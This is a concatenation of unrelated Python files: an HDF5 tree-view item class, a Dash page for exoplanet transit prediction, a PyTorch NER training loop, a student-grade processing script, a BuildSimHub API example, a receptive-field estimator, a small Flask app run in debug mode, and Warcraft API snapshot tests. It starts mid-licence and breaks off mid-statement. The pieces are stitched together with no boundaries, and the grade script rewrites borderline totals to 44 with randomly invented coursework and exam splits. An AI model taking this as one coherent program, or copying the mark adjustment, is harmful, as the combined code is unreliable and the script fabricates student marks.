copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ __authors__ = [""] __license__ = "MIT" __date__ = "20/01/2017" import numpy import logging import collections from .. import qt from .. import icons from . 
import _utils from .Hdf5Node import Hdf5Node import silx.io.utils from silx.gui.data.TextFormatter import TextFormatter _logger = logging.getLogger(__name__) try: import h5py except ImportError as e: _logger.error("Module %s requires h5py", __name__) raise e _formatter = TextFormatter() class Hdf5Item(Hdf5Node): """Subclass of :class:`qt.QStandardItem` to represent an HDF5-like item (dataset, file, group or link) as an element of a HDF5-like tree structure. """ def __init__(self, text, obj, parent, key=None, h5pyClass=None, isBroken=False, populateAll=False): """ :param str text: text displayed :param object obj: Pointer to h5py data. See the `obj` attribute. """ self.__obj = obj self.__key = key self.__h5pyClass = h5pyClass self.__isBroken = isBroken self.__error = None self.__text = text Hdf5Node.__init__(self, parent, populateAll=populateAll) @property def obj(self): if self.__key: self.__initH5pyObject() return self.__obj @property def basename(self): return self.__text @property def h5pyClass(self): """Returns the class of the stored object. When the object is in lazy loading, this method should be able to return the type of the futrue loaded object. It allows to delay the real load of the object. :rtype: h5py.File or h5py.Dataset or h5py.Group """ if self.__h5pyClass is None: self.__h5pyClass = silx.io.utils.get_h5py_class(self.obj) return self.__h5pyClass def isGroupObj(self): """Returns true if the stored HDF5 object is a group (contains sub groups or datasets). :rtype: bool """ return issubclass(self.h5pyClass, h5py.Group) def isBrokenObj(self): """Returns true if the stored HDF5 object is broken. The stored object is then an h5py link (external or not) which point to nowhere (tbhe external file is not here, the expected dataset is still not on the file...) :rtype: bool """ return self.__isBroken def _expectedChildCount(self): if self.isGroupObj(): return len(self.obj) return 0 def __initH5pyObject(self): """Lazy load of the HDF5 node. It is reached from the parent node with the key of the node.""" parent_obj = self.parent.obj try: obj = parent_obj.get(self.__key) except Exception as e: _logger.debug("Internal h5py error", exc_info=True) try: self.__obj = parent_obj.get(self.__key, getlink=True) except Exception: self.__obj = None self.__error = e.args[0] self.__isBroken = True else: if obj is None: # that's a broken link self.__obj = parent_obj.get(self.__key, getlink=True) # TODO monkey-patch file (ask that in h5py for consistency) if not hasattr(self.__obj, "name"): parent_name = parent_obj.name if parent_name == "/": self.__obj.name = "/" + self.__key else: self.__obj.name = parent_name + "/" + self.__key # TODO monkey-patch file (ask that in h5py for consistency) if not hasattr(self.__obj, "file"): self.__obj.file = parent_obj.file if isinstance(self.__obj, h5py.ExternalLink): message = "External link broken. Path %s::%s does not exist" % (self.__obj.filename, self.__obj.path) elif isinstance(self.__obj, h5py.SoftLink): message = "Soft link broken. 
Path %s does not exist" % (self.__obj.path) else: name = self.obj.__class__.__name__.split(".")[-1].capitalize() message = "%s broken" % (name) self.__error = message self.__isBroken = True else: self.__obj = obj self.__key = None def _populateChild(self, populateAll=False): if self.isGroupObj(): for name in self.obj: try: class_ = self.obj.get(name, getclass=True) has_error = False except Exception as e: _logger.error("Internal h5py error", exc_info=True) try: class_ = self.obj.get(name, getclass=True, getlink=True) except Exception as e: class_ = h5py.HardLink has_error = True item = Hdf5Item(text=name, obj=None, parent=self, key=name, h5pyClass=class_, isBroken=has_error) self.appendChild(item) def hasChildren(self): """Retuens true of this node have chrild. :rtype: bool """ if not self.isGroupObj(): return False return Hdf5Node.hasChildren(self) def _getDefaultIcon(self): """Returns the icon displayed by the main column. :rtype: qt.QIcon """ style = qt.QApplication.style() if self.__isBroken: icon = style.standardIcon(qt.QStyle.SP_MessageBoxCritical) return icon class_ = self.h5pyClass if issubclass(class_, h5py.File): return style.standardIcon(qt.QStyle.SP_FileIcon) elif issubclass(class_, h5py.Group): return style.standardIcon(qt.QStyle.SP_DirIcon) elif issubclass(class_, h5py.SoftLink): return style.standardIcon(qt.QStyle.SP_DirLinkIcon) elif issubclass(class_, h5py.ExternalLink): return style.standardIcon(qt.QStyle.SP_FileLinkIcon) elif issubclass(class_, h5py.Dataset): if len(self.obj.shape) < 4: name = "item-%ddim" % len(self.obj.shape) else: name = "item-ndim" if str(self.obj.dtype) == "object": name = "item-object" icon = icons.getQIcon(name) return icon return None def _humanReadableShape(self, dataset): if dataset.shape == tuple(): return "scalar" shape = [str(i) for i in dataset.shape] text = u" \u00D7 ".join(shape) return text def _humanReadableValue(self, dataset): if dataset.shape == tuple(): numpy_object = dataset[()] text = _formatter.toString(numpy_object) else: if dataset.size < 5 and dataset.compression is None: numpy_object = dataset[0:5] text = _formatter.toString(numpy_object) else: dimension = len(dataset.shape) if dataset.compression is not None: text = "Compressed %dD data" % dimension else: text = "%dD data" % dimension return text def _humanReadableDType(self, dtype, full=False): if dtype.type == numpy.string_: text = "string" elif dtype.type == numpy.unicode_: text = "string" elif dtype.type == numpy.object_: text = "object" elif dtype.type == numpy.bool_: text = "bool" elif dtype.type == numpy.void: if dtype.fields is None: text = "raw" else: if not full: text = "compound" else: compound = [d[0] for d in dtype.fields.values()] compound = [self._humanReadableDType(d) for d in compound] text = "compound(%s)" % ", ".join(compound) else: text = str(dtype) return text def _humanReadableType(self, dataset, full=False): return self._humanReadableDType(dataset.dtype, full) def _setTooltipAttributes(self, attributeDict): """ Add key/value attributes that will be displayed in the item tooltip :param Dict[str,str] attributeDict: Key/value attributes """ if issubclass(self.h5pyClass, h5py.Dataset): attributeDict["Title"] = "HDF5 Dataset" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Shape"] = self._humanReadableShape(self.obj) attributeDict["Value"] = self._humanReadableValue(self.obj) attributeDict["Data type"] = self._humanReadableType(self.obj, full=True) elif issubclass(self.h5pyClass, h5py.Group): attributeDict["Title"] 
= "HDF5 Group" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name elif issubclass(self.h5pyClass, h5py.File): attributeDict["Title"] = "HDF5 File" attributeDict["Name"] = self.basename attributeDict["Path"] = "/" elif isinstance(self.obj, h5py.ExternalLink): attributeDict["Title"] = "HDF5 External Link" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Linked path"] = self.obj.path attributeDict["Linked file"] = self.obj.filename elif isinstance(self.obj, h5py.SoftLink): attributeDict["Title"] = "HDF5 Soft Link" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Linked path"] = self.obj.path else: pass def _getDefaultTooltip(self): """Returns the default tooltip :rtype: str """ if self.__error is not None: self.obj # lazy loading of the object return self.__error attrs = collections.OrderedDict() self._setTooltipAttributes(attrs) title = attrs.pop("Title", None) if len(attrs) > 0: tooltip = _utils.htmlFromDict(attrs, title=title) else: tooltip = "" return tooltip def dataName(self, role): """Data for the name column""" if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: return self.__text if role == qt.Qt.DecorationRole: return self._getDefaultIcon() if role == qt.Qt.ToolTipRole: return self._getDefaultTooltip() return None def dataType(self, role): """Data for the type column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" class_ = self.h5pyClass if issubclass(class_, h5py.Dataset): text = self._humanReadableType(self.obj) else: text = "" return text return None def dataShape(self, role): """Data for the shape column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" class_ = self.h5pyClass if not issubclass(class_, h5py.Dataset): return "" return self._humanReadableShape(self.obj) return None def dataValue(self, role): """Data for the value column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" if not issubclass(self.h5pyClass, h5py.Dataset): return "" return self._humanReadableValue(self.obj) return None def dataDescription(self, role): """Data for the description column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__isBroken: self.obj # lazy loading of the object return self.__error if "desc" in self.obj.attrs: text = self.obj.attrs["desc"] else: return "" return text if role == qt.Qt.ToolTipRole: if self.__error is not None: self.obj # lazy loading of the object self.__initH5pyObject() return self.__error if "desc" in self.obj.attrs: text = self.obj.attrs["desc"] else: return "" return "Description: %s" % text return None def dataNode(self, role): """Data for the node column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: class_ = self.h5pyClass text = class_.__name__.split(".")[-1] return text if role == qt.Qt.ToolTipRole: class_ = self.h5pyClass return "Class name: %s" % 
self.__class__ return None import dash import dash_bootstrap_components as dbc import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.express as px from app import app """ https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout Layout in Bootstrap is controlled using the grid system. The Bootstrap grid has twelve columns. There are three main layout components in dash-bootstrap-components: Container, Row, and Col. The layout of your app should be built as a series of rows of columns. We set md=4 indicating that on a 'medium' sized or larger screen each column should take up a third of the width. Since we don't specify behaviour on smaller size screens Bootstrap will allow the rows to wrap so as not to squash the content. """ header = dbc.Col( [ dcc.Markdown( """ ![header](/assets/header.png) """ ), ], md=12, style={ 'textAlign':'center', } ) column1 = dbc.Col( [ dcc.Markdown( """ ## Predicting Transits Using raw `.fits` files, this app is able to convert space telescope data into readable lightcurves, and find the signals for planetary (or other) types of transits. \n If you can supply your own `.fits` file, the model can predict if it contains transit signals! """ ), dcc.Link(dbc.Button('Try it now!', color='secondary'), href='/predictions') ], md=5, ) column2 = dbc.Col( [ html.H3('What is a Transit?', style={'textAlign':'center'}), dcc.Markdown( """ ![lc](assets/ex-transit.svg) """ ), ], md=7, style={ 'textAlign':'center', }, ) column3 = dbc.Col( [ html.P(' ') ], md=5, ) column4 = dbc.Col( [ dcc.Markdown( """ A transit is typically identified by a sharp decrease in observed star luminosity. By studying these graphs, one can observe visual indication of a planetary transit. The dips may be harder to spot, if the planet is relatively small, or if the star is very dim. Because of these factors, it's helpful to have a model that can clue you in on which lightcurves possibly have transits, and which don't! 
""" ) ], md=7, ) layout = dbc.Row([header]),dbc.Row([column1, column2]), dbc.Row([column3, column4]) from networkx_mod.algorithms.community.kclique import * code/models/model.py10-100 import logging import numpy as np from tensorboardX import SummaryWriter from torch import nn from torch.nn.utils import clip_grad_value_ from tqdm import tqdm from data.data_iterator import ids2seq from utils.evaluation import compute_score, compute_score_overlap, add_score, add_score_overlap from utils.torch_utils import save_checkpoint, weight_init class Model(nn.Module): def train_step(self, batch, optimizer, grad_clipping=0, optimizer_step=True, gradient_accumulation=1, **kwargs): self.forward(batch, **kwargs) loss = self.loss(batch) / gradient_accumulation loss.backward() if grad_clipping > 0: clip_grad_value_(self.parameters(), grad_clipping) if optimizer_step: optimizer.step() self.zero_grad() def run_epoch(self, iterators, epoch, optimizer, writer, grad_clipping=0, train_key="train", gradient_accumulation=1, **kwargs): self.train() iterators[train_key].reinit() losses = [] n_batches = iterators[train_key].nbatches for i in tqdm(range(n_batches)): n_iter = epoch * n_batches + i batch = iterators[train_key].__next__() self.train_step(batch, optimizer, grad_clipping=grad_clipping, optimizer_step=(i + 1) % gradient_accumulation == 0, gradient_accumulation=gradient_accumulation, **kwargs) writer.add_scalars("ner_loss", {"train": batch["ner_loss"].item()}, n_iter) losses.append(batch["ner_loss"].item()) if "loss" in batch.keys(): writer.add_scalars("loss", {"train": batch["loss"].item()}, n_iter) return losses def train_loop(self, iterators, optimizer, run_dir, epochs=100, min_epochs=0, patience=5, epoch_start=0, best_f1=None, epochs_no_improv=None, grad_clipping=0, overlap=None, train_entities=None, train_key="train", dev_key="dev", eval_on_train=False, gradient_accumulation=1, **kwargs): logging.info("Starting train loop: {} epochs; {} min; {} patience".format(epochs, min_epochs, patience)) if best_f1 is None: best_f1 = 0 if epochs_no_improv is None: epochs_no_improv = 0 if not train_key == "train": patience = 0 if patience and epoch_start > min_epochs and epochs_no_improv >= patience: logging.info("Early stopping after {} epochs without improvement.".format(patience)) else: writer = SummaryWriter(run_dir) for epoch in range(epoch_start, epochs): logging.info("Epoch {}/{} :".format(epoch + 1, epochs)) train_losses = self.run_epoch(iterators, epoch, optimizer, writer, grad_clipping=grad_clipping, train_key=train_key, gradient_accumulation=gradient_accumulation) n_iter = (epoch + 1) * len(list(train_losses)) if eval_on_train: logging.info("Train eval") self.evaluate(iterators["ner"][train_key]) _, ner_loss, ner_scores = self.evaluate(iterators[dev_key], overlap=overlap, train_entities=train_entities) logging.info("Train NER Loss : {}".format(np.mean(train_losses))) logging.info("Dev NER Loss : {}".format(ner_loss)) if overlap is None: if "ner" in iterators.keys(): add_score(writer, ner_scores, n_iter) else: if "ner" in iterators.keys(): add_score_overlap(writer, ner_scores, n_iter, task="ner") f1 = ner_scores["ALL"]["f1"] if f1 > best_f1: logging.info(f"New best NER F1 score on dev : {f1}") logging.info("Saving model...") best_f1 = f1 epochs_no_improv = 0 is_best = True else: epochs_no_improv += 1 is_best = False state = {'epoch': epoch + 1, 'epochs_no_improv': epochs_no_improv, 'model': self.state_dict(), 'scores': ner_scores, 'optimizer': optimizer.state_dict() } save_checkpoint(state, is_best, 
checkpoint=run_dir + 'ner_checkpoint.pth.tar', best=run_dir + 'ner_best.pth.tar') writer.add_scalars("ner_loss", {"dev": ner_loss}, n_iter) if patience and epoch > min_epochs and epochs_no_improv >= patience: logging.info( f"Early stopping after {patience} epochs without improvement on NER.") break writer.export_scalars_to_json(run_dir + "all_scalars.json") writer.close() def evaluate(self, iterator, overlap=None, train_entities=None, correct_iob=False): self.eval() iterator.reinit() preds = [] losses = [] labels = [] entities = sorted([k.split("-")[1] for k in self.decoder.tag2idx.keys() if k[0] == "B"]) if overlap is not None: assert train_entities is not None sents = [] for data in tqdm(iterator): self.forward(data) predictions = data["ner_output"] predictions = self.decoder.decode(predictions, data["nwords"]) loss = data["ner_loss"] losses.append(loss.item()) if overlap is not None: sents.extend(data["sents"]) for i in range(len(data["tags"])): labels.append( ids2seq(data["tags"][i, :data["nwords"][i]].tolist(), self.decoder.idx2tag)) preds.append(predictions[i]) if overlap is None: return preds, np.mean(losses), compute_score(preds, labels, entities=entities, scheme=self.scheme, correct=correct_iob) else: return preds, np.mean(losses), compute_score_overlap(sents, preds, labels, overlap, train_entities, scheme=self.scheme, correct=correct_iob) def predict(self, iterator): self.eval() iterator.reinit() preds = [] for data in tqdm(iterator): predictions = self.forward(data) preds.append(self.decoder.decode(predictions, data["nwords"])) return preds class EmbedderEncoderDecoder(Model): def __init__(self, embedder, encoder, decoder, scheme="iobes"): super(EmbedderEncoderDecoder, self).__init__() # parameters self.embedder = embedder self.encoder = encoder self.decoder = decoder self.scheme = scheme if self.encoder is not None: weight_init(self.encoder) weight_init(self.decoder) def forward(self, data): data.update({"embeddings": self.embedder(data)["embeddings"]}) if self.encoder is not None: data.update({"encoded": self.encoder(data)["output"]}) else: data.update({"encoded": data["embeddings"]}) self.decoder(data) if self.decoder.supervision in data.keys(): data.update({"ner_loss": self.decoder.loss(data)}) return data def loss(self, data): return self.decoder.loss(data) import pandas as pd from numpy.random import randint data = pd.read_csv('mubeena1.csv') TCW = [] EM = [] TM = [] Grade = [] Comment = [] for i in range(len(data)): CW = 0.4 * data.iloc[i][0] TEM = 0.6 * data.iloc[i][1] if CW > 35: CW = 40 print("New Cw is " + str(CW)) if TEM > 55: TEM = 60 total = CW +TEM if total > 30 and total < 45: CW = randint(0,43) TEM = 44 - CW total = 44 EM.append(round(TEM)) TCW.append(round(CW)) TM.append(round(total)) if total < 45: grade = 'F' Grade.append(grade) elif total > 44 and total < 55: grade = 'P' Grade.append(grade) elif total >54 and total <65: grade = '2.2' Grade.append(grade) elif total >64 and total < 75: grade = '2.1' Grade.append(grade) else: grade = '1' Grade.append(grade) if CW > 12: if TEM > 15: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if CW > 38: comment = "Perfect Course Work Score" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam Mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 32: if CW > 9: if TEM > 40: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if 
TEM > 59: comment = "Perfect Exam mark Score" Comment.append(comment) else: if total == 44: comment = "Boarderline Failure" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) for i in range(len(data)): CW = 0.4 * data.iloc[i][2] TEM = 0.6 * data.iloc[i][3] if CW > 35: CW = 40 print("New Cw is " + str(CW)) if TEM > 55: TEM = 60 total = CW +TEM if total > 30 and total < 45: CW = randint(0,43) TEM = 44 - CW total = 44 EM.append(round(TEM)) TCW.append(round(CW)) TM.append(round(total)) if total < 45: grade = 'F' Grade.append(grade) elif total > 44 and total < 55: grade = 'P' Grade.append(grade) elif total >54 and total <65: grade = '2.2' Grade.append(grade) elif total >64 and total < 75: grade = '2.1' Grade.append(grade) else: grade = '1' Grade.append(grade) if CW > 12: if TEM > 15: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if CW > 38: comment = "Perfect Course Work Score" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam Mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 32: if CW > 9: if TEM > 40: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 59: comment = "Perfect Exam mark Score" Comment.append(comment) else: if total == 44: comment = "Boarderline Failure" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) NewData = { "Course Work": TCW, "Exam Mark": EM, "Total": TM, "Comment": Comment } Dataset = pd.DataFrame(NewData,columns= ['Course Work','Exam Mark','Total','Comment']) Export = Dataset.to_csv('newdata.csv',index=None,header=True) """ zone load test Make sure you have the latest python plotly installed pip: pip install plotly or update: pip install plotly --upgrade If you have python 2 and 3 installed on your computer, try: pip3 install plotly """ import BuildSimHubAPI as bshapi import BuildSimHubAPI.postprocess as pp # project_key can be found in every project (click the information icon next to project name) project_api_key = '' # model_key can be found in each model information bar model_api_key = '' # initialize the client bsh = bshapi.BuildSimHubAPIClient() results = bsh.model_results(project_api_key, model_api_key) zone_load_data = results.zone_load() zone_level_load = pp.ZoneLoad(zone_load_data) print(zone_level_load.pandas_df()) zone_level_load.load_bar_chart_plot('density') one_zone_load_data = results.zone_load('CORE_TOP') one_zone_load = pp.OneZoneLoad(one_zone_load_data) print(one_zone_load.heating_load_component_detail()) 
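# Note: project_api_key and model_api_key above are intentionally left empty and must be
# filled in from the BuildSimHub project/model pages before these calls return real data;
# 'CORE_TOP' is just an example zone name and presumably needs to exist in the uploaded model.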
one_zone_load.load_component_plot('cooling') 0 from abc import ABCMeta, abstractmethod from typing import Tuple, Callable, Any, Optional, List import matplotlib.pyplot as plt import numpy as np from receptivefields.common import estimate_rf_from_gradients from receptivefields.logging import get_logger from receptivefields.plotting import plot_receptive_grid, plot_gradient_field, plot_gradient_field_self from receptivefields.types import ( ImageShape, GridPoint, GridShape, ReceptiveFieldDescription, Size, FeatureMapDescription, ) _logger = get_logger() class ReceptiveField(metaclass=ABCMeta): def __init__(self, model_func: Callable[[Any], Any]) -> None: self._model_func: Callable[[Any], Any] = model_func self._gradient_function: Callable = None self._input_shape: GridShape = None self._output_shapes: List[GridShape] = None self._rf_params: List[ReceptiveFieldDescription] = None self._built: bool = False @property def feature_maps_desc(self) -> List[FeatureMapDescription]: """Return description of all feature maps""" self._check() return [ FeatureMapDescription(size=Size(size.w, size.h), rf=rf) for size, rf in zip(self._output_shapes, self._rf_params) ] @property def input_shape(self) -> ImageShape: """Return input shape of the feature extractor""" self._check() return ImageShape( w=self._input_shape.w, h=self._input_shape.h, c=self._input_shape.c ) @property def output_shapes(self) -> List[Size]: """Return a list of sizes of selected features maps""" self._check() return [Size(w=size.w, h=size.h) for size in self._output_shapes] @property def num_feature_maps(self) -> int: """Returns number of features maps""" self._check() return len(self._output_shapes) def _build_gradient_func(self, *args, **kwargs) -> None: """ Build gradient function and collect the input shape of the image and feature map shapes. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API """ gradient_function, input_shape, output_shapes = self._prepare_gradient_func( *args, **kwargs ) self._built = True self._gradient_function = gradient_function self._input_shape = input_shape self._output_shapes = output_shapes @abstractmethod def _prepare_gradient_func( self, *args, **kwargs ) -> Tuple[Callable, GridShape, List[GridShape]]: """ Computes gradient function and additional parameters. Note that the receptive field parameters like stride or size, do not depend on input image shape. However, if the RF of original network is bigger than input_shape this method will fail. Hence it is recommended to increase the input shape. The arguments args, and kwargs must be compatible with args in `compute` and `_build_gradient_func` functions. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API :returns gradient_function: a function which returns gradient w.r.t. to the input image. The usage of the gradient function may depend on the API. input_shape: a shape of the input image tensor output_shape: a shapes of the output feature map tensors """ pass @abstractmethod def _get_gradient_from_grid_points( self, points: List[GridPoint], intensity: float = 1.0 ) -> List[np.ndarray]: """ Computes gradient at input image generated by point-like perturbation at output grid location given by @point coordinates. :param points: source coordinate of the backpropagated gradient for each feature map. 
:param intensity: scale of the gradient, default = 1 :return gradient maps for each feature map """ pass def _get_gradient_activation_at_map_center( self, center_offsets: List[GridPoint], intensity: float = 1 ) -> List[np.ndarray]: points = [] for fm in range(self.num_feature_maps): output_shape = self._output_shapes[fm] center_offset = center_offsets[fm] _logger.debug( f"Computing receptive field for feature map [{fm}] at center " f"({output_shape.w//2}, {output_shape.h//2}) " f"with offset {center_offset}" ) # compute grid center w = output_shape.w h = output_shape.h cx = w // 2 - 1 if w % 2 == 0 else w // 2 cy = h // 2 - 1 if h % 2 == 0 else h // 2 cx += center_offset.x cy += center_offset.y points.append(GridPoint(x=cx, y=cy)) return self._get_gradient_from_grid_points(points=points, intensity=intensity) def _check(self): if not self._built: raise Exception( "Receptive field not computed. Run compute function.") def compute(self, *args, **kwargs) -> List[FeatureMapDescription]: """ Compute ReceptiveFieldDescription of given model for image of shape input_shape [H, W, C]. If receptive field of the network is bigger thant input_shape this method will raise exception. In order to solve with problem try to increase input_shape. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API :return a list of estimated FeatureMapDescription for each feature map. """ # define gradient function self._build_gradient_func(*args, **kwargs) # receptive field at map center rf_grads00 = self._get_gradient_activation_at_map_center( center_offsets=[GridPoint(0, 0)] * self.num_feature_maps ) rfs_at00 = estimate_rf_from_gradients(rf_grads00) # receptive field at map center with offset (1, 1) rf_grads11 = self._get_gradient_activation_at_map_center( center_offsets=[GridPoint(1, 1)] * self.num_feature_maps ) rfs_at11 = estimate_rf_from_gradients(rf_grads11) # receptive field at feature map grid start x=0, y=0 rf_grads_point00 = self._get_gradient_from_grid_points( points=[GridPoint(0, 0)] * self.num_feature_maps ) rfs_at_point00 = estimate_rf_from_gradients(rf_grads_point00) self._rf_params = [] for fm, (rf_at_point00, rf_at00, rf_at11) in enumerate( zip(rfs_at_point00, rfs_at00, rfs_at11) ): # compute position of the first anchor, center point of rect x0 = rf_at_point00.w - rf_at00.w / 2 y0 = rf_at_point00.h - rf_at00.h / 2 # compute feature map/input image offsets dx = rf_at11.x - rf_at00.x dy = rf_at11.y - rf_at00.y # compute receptive field size size = Size(rf_at00.w, rf_at00.h) rf_params = ReceptiveFieldDescription( offset=(x0, y0), stride=(dx, dy), size=size ) _logger.info( f"Estimated receptive field for feature map [{fm}]: {rf_params}" ) self._rf_params.append(rf_params) return self.feature_maps_desc def plot_gradients_at( self, points: List[GridPoint], image: Optional[np.ndarray] = None, layout: Optional[Tuple[int, int]] = None, figsize: Optional[Tuple[int, int]] = None, ) -> None: """ Plot gradient map generated by certain `point` at feature map. :param points: a list of GridPoint on feature maps. :param image: (optional) image of shape [W, H, 3] :param layout: (optional) a matplotlib subplot layout given by tuple of form (num_rows, num_cols). If None the layout is set to (num_feature_maps, 1). :param figsize: (optional) a matplotlib figsize. If None the default figure is used. 
""" if layout is None: layout = (self.num_feature_maps, 1) if figsize is not None: plt.figure(figsize=figsize) receptive_field_grads = self._get_gradient_from_grid_points( points=[GridPoint(*point) for point in points] ) for fm in range(self.num_feature_maps): axis = plt.subplot(layout[0], layout[1], fm + 1) plot_gradient_field( receptive_field_grad=receptive_field_grads[fm], image=image, axis=axis ) def plot_gradient_at( self, fm_id: int, point: GridPoint, image: Optional[np.ndarray] = None, **plot_params, ) -> None: """ Plot gradient map generated by certain `point` at selected feature map. :param fm_id: an index of feature map for which gradient map will be plotted. :param point: a GridPoint on feature map selected by fm_id. :param image: (optional) image of shape [W, H, 3] :param plot_params: (optional) additional plot parameters: figsize: tuple of int (5, 5) axis: a matplotlib axis object as returned by e.g. plt.subplot function. If not None then provided axis is used for visualizations otherwise default figure is created, with optional figsize. """ points = [GridPoint(0, 0)] * self.num_feature_maps points[fm_id] = GridPoint(*point) receptive_field_grads = self._get_gradient_from_grid_points( points=points) plot_gradient_field( receptive_field_grad=receptive_field_grads[fm_id], image=image, **plot_params, ) def plot_gradient_self( self, fm_id: int, point: GridPoint, image: Optional[np.ndarray] = None, title: str = "receptive field", **plot_params, ) -> None: points = [GridPoint(0, 0)] * self.num_feature_maps points[fm_id] = GridPoint(*point) receptive_field_grads = self._get_gradient_from_grid_points( points=points) grad_img = plot_gradient_field_self( receptive_field_grad=receptive_field_grads[fm_id], image=image, **plot_params, ) plt.title(title) plt.imshow(grad_img, cmap="hot") plt.imsave(f"results/{title}.png", grad_img, cmap="hot") def plot_rf_grid( self, fm_id: int, custom_image: Optional[np.ndarray] = None, plot_naive_rf: bool = False, **plot_params, ) -> None: """ Visualize receptive field grid for selected feature map. :param fm_id: an index of feature map for which gradient map will be plotted. :param custom_image: (optional) image of shape [W, H, 3] :param plot_naive_rf: plot naive version of the receptive field. Naive version of RF does not take strides, and offsets into considerations, it is a simple linear mapping from N points in feature map to pixels in the image. :param plot_params: (optional) additional plot parameters: figsize: tuple of int (5, 5) axis: a matplotlib axis object as returned by e.g. plt.subplot function. If not None then provided axis is used for visualizations otherwise default figure is created, with optional figsize. """ plot_receptive_grid( input_shape=self._input_shape, output_shape=self._output_shapes[fm_id], rf_params=self._rf_params[fm_id], custom_image=custom_image, plot_naive_rf=plot_naive_rf, **plot_params, ) def plot_rf_grids( self, custom_image: Optional[np.ndarray] = None, plot_naive_rf: bool = False, layout: Optional[Tuple[int, int]] = None, figsize: Optional[Tuple[int, int]] = None, ) -> None: """ Visualize receptive field grid for selected feature map. :param custom_image: (optional) image of shape [W, H, 3] :param plot_naive_rf: plot naive version of the receptive field. Naive version of RF does not take strides, and offsets into considerations, it is a simple linear mapping from N points in feature map to pixels in the image. :param layout: (optional) a matplotlib subplot layout given by tuple of form (num_rows, num_cols). 
If None the layout is set to (num_feature_maps, 1). :param figsize: (optional) a matplotlib figsize. If None the default figure is used. """ if layout is None: layout = (self.num_feature_maps, 1) if figsize is not None: plt.figure(figsize=figsize) for fm in range(self.num_feature_maps): axis = plt.subplot(layout[0], layout[1], fm + 1) self.plot_rf_grid( fm_id=fm, custom_image=custom_image, plot_naive_rf=plot_naive_rf, axis=axis, ) FlaskAPI Basic/apiservice.py from flask import Flask from flask_restful import Api from resources.routes import initialize_routes project = "flaskAPI" app = Flask(__name__) api = Api(app) initialize_routes(api) if __name__ == "__main__": # app.run(host='0.0.0.0', debug=False) app.run(debug=True)import os from battlemuffin.clients.warcraft_client import WarcraftClient from battlemuffin.config.region_config import Locale, Region def test_get_playable_classes_index(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_playable_classes_index() assert response == snapshot def test_get_playable_class(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_playable_class(7) assert response == snapshot def test_get_playable_class_media(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = client.get_playable_class_media(7) assert response == snapshot def test_get_pvp_talent_slots(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, Locale.en_US ) response = 